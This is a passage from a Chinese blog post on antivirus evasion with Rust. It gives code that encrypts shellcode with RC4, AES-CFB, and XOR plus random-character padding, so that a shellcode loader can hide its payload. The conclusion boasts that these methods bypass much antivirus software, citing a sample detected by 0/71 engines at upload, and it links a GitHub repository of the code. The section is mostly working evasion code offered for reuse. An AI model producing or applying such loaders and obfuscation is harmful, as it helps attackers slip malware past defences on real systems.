<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">rust-crypto</span>=<span class="string">&quot;0.2.36&quot;</span></span><br><span class="line"><span class="attr">base64</span>=<span class="string">&quot;0.13.0&quot;</span></span><br><span class="line"><span class="attr">rustc-serialize</span> = <span class="string">&quot;0.3&quot;</span></span><br></pre></td></tr></table></figure>

<p>下面是实现RC4加解密的代码，在加密的函数中最终返回的是Base64编码后的字符串，而解密函数最终返回的是Vec数组，这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> crypto::rc4::Rc4;</span><br><span class="line"><span class="keyword">use</span> crypto::symmetriccipher::SynchronousStreamCipher;</span><br><span class="line"><span class="keyword">use</span> std::iter::repeat;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">main</span></span>() &#123;</span><br><span class="line">    <span class="keyword">let</span> buffer = include_bytes!(<span class="string">&quot;..\\calc.bin&quot;</span>).as_slice();</span><br><span class="line">    <span class="keyword">let</span> key = <span class="string">&quot;pRNtb343heAlnPFw5QiPHKxz3Z1dzLsqhiUyBNtTiI21DjUsZ0&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> b64_string = enc(buffer, key);</span><br><span class="line">    <span class="keyword">let</span> shellcode = dec(b64_string.as_str(), key);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;== RC4 ==&quot;</span>);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;Key: &#123;&#125;&quot;</span>, key);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;\nEncrypted (Base-64): &#123;&#125;&quot;</span>, b64_string);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;\nDecrypted: &#123;:?&#125;&quot;</span>, shellcode);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">enc</span></span>(shellcode: &amp;[<span class="built_in">u8</span>], key: &amp;<span class="built_in">str</span>) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> rc4 = Rc4::new(key.as_bytes());</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> result: <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; = repeat(<span class="number">0</span>).take(shellcode.len()).collect();</span><br><span class="line">    rc4.process(shellcode, &amp;<span class="keyword">mut</span> result);</span><br><span class="line"></span><br><span class="line">    base64::encode(&amp;<span class="keyword">mut</span> result)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">dec</span></span>(b64: &amp;<span class="built_in">str</span>, key: &amp;<span class="built_in">str</span>) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> result = <span class="keyword">match</span> base64::decode(b64) &#123;</span><br><span class="line">        <span class="literal">Ok</span>(result) =&gt; result,</span><br><span class="line">        _ =&gt; <span class="string">&quot;&quot;</span>.as_bytes().to_vec(),</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> rc4 = Rc4::new(key.as_bytes());</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> shellcode: <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; = repeat(<span class="number">0</span>).take(result.len()).collect();</span><br><span class="line">    rc4.process(&amp;<span class="keyword">mut</span> result[..], &amp;<span class="keyword">mut</span> shellcode);</span><br><span class="line"></span><br><span class="line">    shellcode</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="AES-CFB加密"><a href="#AES-CFB加密" class="headerlink" title="AES-CFB加密"></a>AES-CFB加密</h3><p>Rust要实现AES加密与加密也需要引入依赖，在<code>Cargo.toml</code>文件中添加下面的依赖。</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">aes</span>=<span class="string">&quot;0.7.5&quot;</span></span><br><span class="line"><span class="attr">hex</span>=<span class="string">&quot;0.4.3&quot;</span></span><br><span class="line"><span class="attr">block-modes</span>=<span class="string">&quot;0.8.1&quot;</span></span><br><span class="line"><span class="attr">hex-literal</span>=<span class="string">&quot;0.3.3&quot;</span></span><br></pre></td></tr></table></figure>

<p>下面是实现AES-CFB加解密的代码，在加密的函数中最终返回的是Hex编码后的字符串，而解密函数最终返回的是Vec数组，同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> aes::Aes128;</span><br><span class="line"><span class="keyword">use</span> block_modes::block_padding::Pkcs7;</span><br><span class="line"><span class="keyword">use</span> block_modes::&#123;BlockMode, Cfb&#125;;</span><br><span class="line"><span class="keyword">use</span> hex::encode;</span><br><span class="line"><span class="keyword">use</span> hex_literal::hex;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">type</span> <span class="title">Aes128ECfb</span></span> = Cfb&lt;Aes128, Pkcs7&gt;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">main</span></span>() &#123;</span><br><span class="line">    <span class="keyword">let</span> shellcode = include_bytes!(<span class="string">&quot;..\\calc.bin&quot;</span>).as_slice();</span><br><span class="line">    <span class="keyword">let</span> key = <span class="string">&quot;gWW8QklFyVIQfpDN&quot;</span>;</span><br><span class="line">    <span class="keyword">let</span> iv = hex!(<span class="string">&quot;57504c385a78736f336b4946426a626f&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;==128-bit AES CFB Mode==&quot;</span>);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;Key: &#123;&#125;&quot;</span>, key);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;iv: &#123;&#125;&quot;</span>, encode(iv));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> encrypted = enc(shellcode, key, iv);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;\nEncrypted: &#123;&#125;&quot;</span>, encrypted);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> decrypted = dec(encrypted.as_str(), key, iv);</span><br><span class="line">    <span class="built_in">println!</span>(<span class="string">&quot;\nDecrypted: &#123;:?&#125;&quot;</span>, decrypted);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">enc</span></span>(shellcode: &amp;[<span class="built_in">u8</span>], key: &amp;<span class="built_in">str</span>, iv: [<span class="built_in">u8</span>; <span class="number">16</span>]) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> key = key.as_bytes().to_vec();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> cipher = Aes128ECfb::new_from_slices(key.as_slice(), iv.as_slice()).unwrap();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> pos = shellcode.len();</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> buffer = [<span class="number">0u8</span>; <span class="number">2560</span>];</span><br><span class="line">    buffer[..pos].copy_from_slice(shellcode);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> ciphertext = cipher.encrypt(&amp;<span class="keyword">mut</span> buffer, pos).unwrap();</span><br><span class="line"></span><br><span class="line">    hex::encode(ciphertext)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">dec</span></span>(encrypted: &amp;<span class="built_in">str</span>, key: &amp;<span class="built_in">str</span>, iv: [<span class="built_in">u8</span>; <span class="number">16</span>]) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> binding = hex::decode(encrypted).expect(<span class="string">&quot;Decoding failed&quot;</span>);</span><br><span class="line">    <span class="keyword">let</span> ciphertext = binding.as_slice();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> key = key.as_bytes().to_vec();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> cipher = Aes128ECfb::new_from_slices(key.as_slice(), iv.as_slice()).unwrap();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> buf = ciphertext.to_vec();</span><br><span class="line">    <span class="keyword">let</span> shellcode = cipher.decrypt(&amp;<span class="keyword">mut</span> buf).unwrap();</span><br><span class="line"></span><br><span class="line">    shellcode.to_vec()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="添加随机字符"><a href="#添加随机字符" class="headerlink" title="添加随机字符"></a>添加随机字符</h3><p>同样先在<code>Cargo.toml</code>文件中添加下面的依赖。</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">hex</span> = <span class="string">&quot;0.4.3&quot;</span></span><br></pre></td></tr></table></figure>

<p>下面是结合异或加密和添加随机字符的代码，<code>xor_encrypt</code>将对shellcode与key进行异或，使用<code>hex::encode</code>将异或结果转为十六进制字符串返回，方便后面添加随机字符。<code>add_random</code>迭代<code>xor_encrypt</code>返回的字符串的每个字符，并在每次迭代时添加一个随机字符。最后，使用 <code>hex::encode</code> 将结果转为十六进制字符串返回。<code>xor_decrypt</code>和<code>rm_random</code>是对应的二次异或和删除随机字符的函数。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">xor_encrypt</span></span>(shellcode: &amp;[<span class="built_in">u8</span>], key: &amp;[<span class="built_in">u8</span>]) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> encrypted = <span class="built_in">Vec</span>::new();</span><br><span class="line">    <span class="keyword">for</span> (i, &amp;b) <span class="keyword">in</span> shellcode.iter().enumerate() &#123;</span><br><span class="line">        encrypted.push(b ^ key[i % key.len()]);</span><br><span class="line">    &#125;</span><br><span class="line">    hex::encode(&amp;encrypted)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">xor_decrypt</span></span>(encrypted: &amp;[<span class="built_in">u8</span>], key: &amp;[<span class="built_in">u8</span>]) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> encrypted = hex::decode(encrypted).expect(<span class="string">&quot;Error&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> decrypted = <span class="built_in">Vec</span>::new();</span><br><span class="line">    <span class="keyword">for</span> (i, &amp;b) <span class="keyword">in</span> encrypted.iter().enumerate() &#123;</span><br><span class="line">        decrypted.push(b ^ key[i % key.len()]);</span><br><span class="line">    &#125;</span><br><span class="line">    decrypted</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">add_random</span></span>(xor_string: &amp;<span class="built_in">str</span>, key: &amp;<span class="built_in">str</span>) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> result = <span class="built_in">String</span>::new();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (i, c) <span class="keyword">in</span> xor_string.chars().enumerate() &#123;</span><br><span class="line">        result.push(c);</span><br><span class="line">        result.push(key.chars().nth(i % key.len()).unwrap());</span><br><span class="line">    &#125;</span><br><span class="line">    hex::encode(&amp;result)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">rm_random</span></span>(random_string: &amp;<span class="built_in">str</span>) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> result = <span class="built_in">String</span>::new();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> random_string = hex::decode(random_string).expect(<span class="string">&quot;Invalid String&quot;</span>);</span><br><span class="line">    <span class="keyword">let</span> random_string = <span class="keyword">match</span> std::<span class="built_in">str</span>::from_utf8(random_string.as_slice()) &#123;</span><br><span class="line">        <span class="literal">Ok</span>(s) =&gt; s,</span><br><span class="line">        <span class="literal">Err</span>(_) =&gt; <span class="string">&quot;Invalid UTF-8 sequence&quot;</span>,</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (i, c) <span class="keyword">in</span> random_string.chars().enumerate() &#123;</span><br><span class="line">        <span class="keyword">if</span> i % <span class="number">2</span> == <span class="number">0</span> &#123;</span><br><span class="line">            result.push(c);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    result.as_bytes().to_vec()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Rust的编译体积是非常小的，虽然比不上C/C++，但是和Python和Go相比优势还是非常大的，并且Rust的热门程度也远小于Python和Go，所以杀软对Rust的检出程度也是非常低的，这都是Rust免杀的天然优势。结合本文章几种基础的加载方式和混淆方式还是可以轻松过一部分杀软的。以下链接是我半年前上传到virustotal的一个样本，半年过去了，目前的检出率为14/71：<a target="_blank" rel="noopener" href="https://www.virustotal.com/gui/file/abb4cfcf4d8a8ce920f61201311950f82ca94c7c00f450f32f666d71c2c8c0f6/details">VirusTotal File</a>（刚上传时检出率为0/71）。<br>这篇文章的代码部分我也已经提交到Github供大家参考：<br><a target="_blank" rel="noopener" href="https://github.com/colind0pe/AV-Bypass-Learning/tree/master/rust-bypass-av">AV-Bypass-Learning/rust-bypass-av</a></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://rustwiki.org/zh-CN/reference/">Rust 参考手册 中文版</a><br><a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/">Programming reference for the Win32 API</a><br><a target="_blank" rel="noopener" href="https://doc.rust-lang.org/std/macro.include_bytes.html">include_bytes in std - Rust</a><br><a target="_blank" rel="noopener" href="https://doc.rust-lang.org/reference/abi.html#the-link_section-attribute">Application Binary Interface - The Rust Reference</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shellcode%E5%8A%A0%E8%BD%BD%E6%96%B9%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">Shellcode加载方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8WinAPI"><span class="toc-number">2.1.</span> <span class="toc-text">调用WinAPI</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88"><span class="toc-number">2.2.</span> <span class="toc-text">函数指针</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87-heapapi-%E7%94%B3%E8%AF%B7%E5%86%85%E5%AD%98"><span class="toc-number">2.3.</span> <span class="toc-text">通过 heapapi 申请内存</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shellcode%E6%B7%B7%E6%B7%86%E6%96%B9%E5%BC%8F"><span class="toc-number">3.</span> <span class="toc-text">Shellcode混淆方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Base64%E7%BC%96%E7%A0%81"><span class="toc-number">3.1.</span> <span class="toc-text">Base64编码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hex%E7%BC%96%E7%A0%81"><span class="toc-number">3.2.</span> <span class="toc-text">Hex编码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%82%E6%88%96%E5%8A%A0%E5%AF%86"><span class="toc-number">3.3.</span> <span class="toc-text">异或加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RC4%E5%8A%A0%E5%AF%86"><span class="toc-number">3.4.</span> <span class="toc-text">RC4加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#AES-CFB%E5%8A%A0%E5%AF%86"><span class="toc-number">3.5.</span> <span class="toc-text">AES-CFB加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0%E9%9A%8F%E6%9C%BA%E5%AD%97%E7%AC%A6"><span class="toc-number">3.6.</span> <span class="toc-text">添加随机字符</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&text=Rust免杀-Shellcode加载与混淆"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&is_video=false&description=Rust免杀-Shellcode加载与混淆"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Rust免杀-Shellcode加载与混淆&body=Check out this article: http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&name=Rust免杀-Shellcode加载与混淆&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&t=Rust免杀-Shellcode加载与混淆"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2023
    colind0pe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
